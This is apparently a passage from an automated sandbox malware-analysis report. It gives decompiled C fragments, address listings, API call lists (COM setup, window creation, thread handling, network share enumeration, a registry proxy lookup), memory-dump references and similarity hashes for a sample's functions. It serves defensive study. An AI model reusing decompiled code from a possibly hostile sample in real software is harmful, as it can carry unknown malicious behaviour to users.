				asm("movq xmm0, [0x7098cf64]");
				_push( &_v128);
				_v164 = 0;
				asm("movq [esp+0x3c], xmm0");
				_push(0x7098cf6c);
				_push(_t83);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
					goto L16;
				}
				_t86 = _v180;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _v168, 2); // executed
				if(_t88 < 0) {
					L15:
					_t89 = _v192;
					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
					goto L16;
				}
				_t91 = _v192;
				_v196 = 0;
				_v184 = 0;
				_t93 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))(_t91,  &_v196,  &_v184); // executed
				if(_t93 >= 0) {
					L7098BF02();
					_t94 = StrChrW(0x7098cdb0, 0x49);
					_v136 = _t94;
					__imp__#8( &_v196,  &_v136, 0x20);
					asm("movss xmm0, [0x7098cdac]");
					_v200 = 4;
					_t96 = _v212;
					asm("movss [esp+0x2c], xmm0");
					 *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x10))))(_t96, 1,  &_v152,  &_v200);
					_t99 = _v240;
					_push(_v228);
					_push(_t99);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xc))))() >= 0) {
						asm("movq xmm0, [0x7098cf7c]");
						_t106 = _v248;
						_push(_v132);
						asm("movq [esp+0x40], xmm0");
						asm("movq xmm0, [0x7098cf84]");
						asm("movq [esp+0x48], xmm0");
						_push(_v136);
						_push(_t106);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x10))))() >= 0) {
							_t109 = _v260;
							_t111 =  *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x18))))(_t109,  &_v204); // executed
							if(_t111 >= 0) {
								_t112 = _v268;
								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x2c))))(_t112, _v248, 0); // executed
								if(_t114 >= 0) {
									_t115 = _v280;
									_push(_t115);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x30))))() >= 0) {
										_t117 = _v280;
										_push(_t117);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x2c))))() >= 0) {
											_t165 = 1;
										}
									}
								}
							}
						}
					}
					_t102 = _v248;
					 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102); // executed
					_t104 = _v240;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104); // executed
				}
			}

























































                                                                                                        0x70986914
                                                                                                        0x70986918
                                                                                                        0x7098691e
                                                                                                        0x70986930
                                                                                                        0x70986934
                                                                                                        0x7098693c
                                                                                                        0x70986b62
                                                                                                        0x70986b62
                                                                                                        0x70986b6e
                                                                                                        0x70986b6e
                                                                                                        0x70986942
                                                                                                        0x70986954
                                                                                                        0x7098695f
                                                                                                        0x70986963
                                                                                                        0x70986b56
                                                                                                        0x70986b56
                                                                                                        0x70986b60
                                                                                                        0x00000000
                                                                                                        0x70986b60
                                                                                                        0x70986969
                                                                                                        0x70986971
                                                                                                        0x70986977
                                                                                                        0x70986978
                                                                                                        0x70986980
                                                                                                        0x70986b4a
                                                                                                        0x70986b4a
                                                                                                        0x70986b54
                                                                                                        0x00000000
                                                                                                        0x70986b54
                                                                                                        0x70986986
                                                                                                        0x70986990
                                                                                                        0x70986991
                                                                                                        0x70986999
                                                                                                        0x70986b3e
                                                                                                        0x70986b3e
                                                                                                        0x70986b48
                                                                                                        0x00000000
                                                                                                        0x70986b48
                                                                                                        0x7098699f
                                                                                                        0x709869a7
                                                                                                        0x709869af
                                                                                                        0x709869b4
                                                                                                        0x709869ba
                                                                                                        0x709869c2
                                                                                                        0x709869c3
                                                                                                        0x709869c7
                                                                                                        0x709869cf
                                                                                                        0x709869d4
                                                                                                        0x709869dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709869e2
                                                                                                        0x709869f3
                                                                                                        0x709869f7
                                                                                                        0x70986b32
                                                                                                        0x70986b32
                                                                                                        0x70986b3c
                                                                                                        0x00000000
                                                                                                        0x70986b3c
                                                                                                        0x709869fd
                                                                                                        0x70986a0a
                                                                                                        0x70986a0e
                                                                                                        0x70986a19
                                                                                                        0x70986a1d
                                                                                                        0x70986a2a
                                                                                                        0x70986a36
                                                                                                        0x70986a41
                                                                                                        0x70986a45
                                                                                                        0x70986a4b
                                                                                                        0x70986a5d
                                                                                                        0x70986a62
                                                                                                        0x70986a6b
                                                                                                        0x70986a79
                                                                                                        0x70986a7b
                                                                                                        0x70986a85
                                                                                                        0x70986a86
                                                                                                        0x70986a8e
                                                                                                        0x70986a98
                                                                                                        0x70986aa0
                                                                                                        0x70986aa4
                                                                                                        0x70986aa9
                                                                                                        0x70986aaf
                                                                                                        0x70986ab7
                                                                                                        0x70986abf
                                                                                                        0x70986ac0
                                                                                                        0x70986ac8
                                                                                                        0x70986aca
                                                                                                        0x70986ad9
                                                                                                        0x70986add
                                                                                                        0x70986adf
                                                                                                        0x70986aef
                                                                                                        0x70986af3
                                                                                                        0x70986af5
                                                                                                        0x70986afe
                                                                                                        0x70986b03
                                                                                                        0x70986b05
                                                                                                        0x70986b0e
                                                                                                        0x70986b13
                                                                                                        0x70986b15
                                                                                                        0x70986b15
                                                                                                        0x70986b13
                                                                                                        0x70986b03
                                                                                                        0x70986af3
                                                                                                        0x70986add
                                                                                                        0x70986ac8
                                                                                                        0x70986b1a
                                                                                                        0x70986b24
                                                                                                        0x70986b26
                                                                                                        0x70986b30
                                                                                                        0x70986b30

                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 70986918
                                                                                                        • CoCreateInstance.OLE32(7098CF4C,00000000,00000001,7098D16C,?), ref: 70986934
                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 70986A2A
                                                                                                        • StrChrW.SHLWAPI(7098CDB0,00000049,?,00000020), ref: 70986A36
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70986A45
                                                                                                        • CoUninitialize.OLE32 ref: 70986B62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 884428471-0
                                                                                                        • Opcode ID: 7ce313ee85df425a58b39ec01d8cb5c836df5000d83fe4c658977065ac72e497
                                                                                                        • Instruction ID: fa3edbac949eff7dfba01e0b27909fdf1832c8907574d510e6fb0bdba651038b
                                                                                                        • Opcode Fuzzy Hash: 7ce313ee85df425a58b39ec01d8cb5c836df5000d83fe4c658977065ac72e497
                                                                                                        • Instruction Fuzzy Hash: D471C5B5208702AFD200DF69C990E5BB7E9AFC8748F108A5DF549CB360D771E946CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00548CC0, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: __sopen_s
                                                                                                        • String ID: UNICODE$UTF-16LE$UTF-8$ccs=
                                                                                                        • API String ID: 2693426323-2506416105
                                                                                                        • Opcode ID: 1844d23df21ced3b53ed2dcff8a6a13c66645c0f7ff99249e0c9cca7ad31ae89
                                                                                                        • Instruction ID: 702510e495a5f5bcef536d03d161e1d4473855560d6e63228f09bd41f4b00816
                                                                                                        • Opcode Fuzzy Hash: 1844d23df21ced3b53ed2dcff8a6a13c66645c0f7ff99249e0c9cca7ad31ae89
                                                                                                        • Instruction Fuzzy Hash: F271EEB1C04209EEDB288F5984493FD7FA8BF1431CF64C42AEC5AA7191EF788A559F04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004F91F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97sleepnetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004F91FC
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • GetTickCount.KERNEL32 ref: 004F9276
                                                                                                        • InternetCloseHandle.WININET(?), ref: 004F92BF
                                                                                                          • Part of subcall function 004B9004: shutdown.WS2_32(000000FF,00000001), ref: 004B901A
                                                                                                          • Part of subcall function 004B9004: closesocket.WS2_32(000000FF), ref: 004B9026
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,BlockGuardThread,00000000,0000006C), ref: 004F92FE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$CloseCountDeleteHandleInitializeInternetSleepTickclosesocketshutdown
                                                                                                        • String ID: BlockGuardThread
                                                                                                        • API String ID: 4006895559-3235377368
                                                                                                        • Opcode ID: 300ac8cc922dc0bcfb891068f57db769b5dd441f4e1f5ceb3424fa2e0cb0c09a
                                                                                                        • Instruction ID: aebc0e39f4333073a657320902b044686f82bcc6320b268cb2b5a0bacd630e9b
                                                                                                        • Opcode Fuzzy Hash: 300ac8cc922dc0bcfb891068f57db769b5dd441f4e1f5ceb3424fa2e0cb0c09a
                                                                                                        • Instruction Fuzzy Hash: 66319C7190020DAFDB24EFA0C885BEEBBB5AF04315F10455EE6027B2D1DB796E49CB58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E9FA6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                        • CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA018
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                        Strings
                                                                                                        • Thread.Create.Failed, xrefs: 004E9FF4
                                                                                                        • CreateThread, not running yet, xrefs: 004EA01F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CreateCriticalIncrementInitializeInterlockedSectionThread
                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                        • API String ID: 3278170271-1474816145
                                                                                                        • Opcode ID: d01d390d35a1307fd29fb6d80dc2c09a384acb8f8eff9fdaf997017fd981838c
                                                                                                        • Instruction ID: fa06a62da20e3ffc879d0189229f950c1cc712b5ae2b368708147620d2bae4ef
                                                                                                        • Opcode Fuzzy Hash: d01d390d35a1307fd29fb6d80dc2c09a384acb8f8eff9fdaf997017fd981838c
                                                                                                        • Instruction Fuzzy Hash: 0C112BB0500344BFDB24EF65CC859AE7BA4FF64351F00822EF511872D0D7746A04C755
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988700, Relevance: 7.6, APIs: 5, Instructions: 94stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70988700(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
				short _v520;
				signed int _t16;
				struct HWND__* _t21;
				long _t35;
				intOrPtr _t37;
				long _t39;
				WCHAR* _t40;
				int _t43;
				struct HWND__* _t55;

				_t35 = _a16;
				if((_t35 & 0x40000000) == 0 || _t35 < 0) {
					_t16 = 1;
					_t35 = _t35 & 0xefffffff;
					_t39 = 0x8000080;
				} else {
					_t39 = _a4;
					_t16 = 0;
				}
				asm("sbb eax, eax");
				_t21 = CreateWindowExW(_t39, _a8,  !( ~_t16) & _a12, _t35,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
				_t55 = _t21;
				_t43 = GetClassNameW(_t55,  &_v520, 0x103);
				if(_t43 <= 0) {
					L10:
					return _t55;
				} else {
					_t40 =  *0x7098f610; // 0x77fbf8
					if(lstrcmpiW( &_v520, _t40) != 0) {
						if(_t43 > 1) {
							_t37 =  *0x7098f608; // 0x7982c4
							if(lstrcmpiW( &_v520, _t37 + 2) == 0) {
								 *0x7098f3cc = _t55; // executed
								 *0x7098f668(_t55, 4); // executed
								 *0x7098f674(_t55, 0, 0, 0, 1, 1, 0x1a);
							}
						}
						goto L10;
					} else {
						DestroyWindow(_t55); // executed
						return 0;
					}
				}
			}












                                                                                                        0x70988700
                                                                                                        0x70988710
                                                                                                        0x709887c6
                                                                                                        0x709887cb
                                                                                                        0x709887d1
                                                                                                        0x7098871e
                                                                                                        0x7098871e
                                                                                                        0x70988725
                                                                                                        0x70988725
                                                                                                        0x70988763
                                                                                                        0x7098877a
                                                                                                        0x70988789
                                                                                                        0x70988793
                                                                                                        0x70988797
                                                                                                        0x70988817
                                                                                                        0x70988822
                                                                                                        0x70988799
                                                                                                        0x70988799
                                                                                                        0x709887af
                                                                                                        0x709887de
                                                                                                        0x709887e0
                                                                                                        0x709887f3
                                                                                                        0x709887f8
                                                                                                        0x709887fe
                                                                                                        0x70988811
                                                                                                        0x70988811
                                                                                                        0x709887f3
                                                                                                        0x00000000
                                                                                                        0x709887b1
                                                                                                        0x709887b2
                                                                                                        0x709887c3
                                                                                                        0x709887c3
                                                                                                        0x709887af

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 7098877A
                                                                                                        • GetClassNameW.USER32 ref: 7098878D
                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 709887AB
                                                                                                        • DestroyWindow.USER32(00000000), ref: 709887B2
                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 709887EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                        • String ID:
                                                                                                        • API String ID: 2351571968-0
                                                                                                        • Opcode ID: 6006cbf14bcd1d84251ac3d9c8bd7dc9b994041ad3243ec20bc1cfeb9a41b9bf
                                                                                                        • Instruction ID: 5887c125f49d817f238331ef8bb07c82189fdf693e4c9d7bd54faf3c39d5f9ba
                                                                                                        • Opcode Fuzzy Hash: 6006cbf14bcd1d84251ac3d9c8bd7dc9b994041ad3243ec20bc1cfeb9a41b9bf
                                                                                                        • Instruction Fuzzy Hash: A431D533215311ABE7209B68CC59FEF73ACEB88710F20452DF655D32C0E674AC0087A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050BFDE, Relevance: 7.6, APIs: 5, Instructions: 77shareCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                        • WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                        • SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                        • WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                        • WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseErrorH_prolog3_catchLastOpenResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 1630679584-0
                                                                                                        • Opcode ID: 39d4e2bfe81039f0c24d9262686457101e8da3a5c1f6d5b9652845a0898684d8
                                                                                                        • Instruction ID: 2b01ff344b20b8029a7cce6901f340b1641c3885abb451ca6fb145d16302bfdd
                                                                                                        • Opcode Fuzzy Hash: 39d4e2bfe81039f0c24d9262686457101e8da3a5c1f6d5b9652845a0898684d8
                                                                                                        • Instruction Fuzzy Hash: 76218D7250020AEFDF229F94CC599EE7FB6FF4A300F104629FA55A61A2C7368A51DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004EA0E3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                        • GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                        • SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CurrentH_prolog3Priority
                                                                                                        • String ID: TM.
                                                                                                        • API String ID: 2855252584-234185721
                                                                                                        • Opcode ID: 37e2064992d4f9002313dce6035d8ccbdc667c0c5420e956fd2395775c3a6b8f
                                                                                                        • Instruction ID: 5a6ade4841129d6a3cde0beb062699e4024c79fba2f0859787c63aaf8a2f2e76
                                                                                                        • Opcode Fuzzy Hash: 37e2064992d4f9002313dce6035d8ccbdc667c0c5420e956fd2395775c3a6b8f
                                                                                                        • Instruction Fuzzy Hash: AE115C71904288AAEB21EBAAC845D5EBB75BF61355F14461FF002971D2D63CAE04C72A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D8D4F, Relevance: 6.1, APIs: 4, Instructions: 112registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004C2457,?,Proxy_IP), ref: 004D8DAB
                                                                                                        • _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$H_prolog3_catch__wmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2030589627-0
                                                                                                        • Opcode ID: ad7cdc050d6d036067b52ba923455fdbf00309b4b3e98ceb8ab4ad11cba69231
                                                                                                        • Instruction ID: 8e503d48b3a9a5b00c99b4d92a2b8f21b7d638f9e343a6dbab2e137ec47b5f21
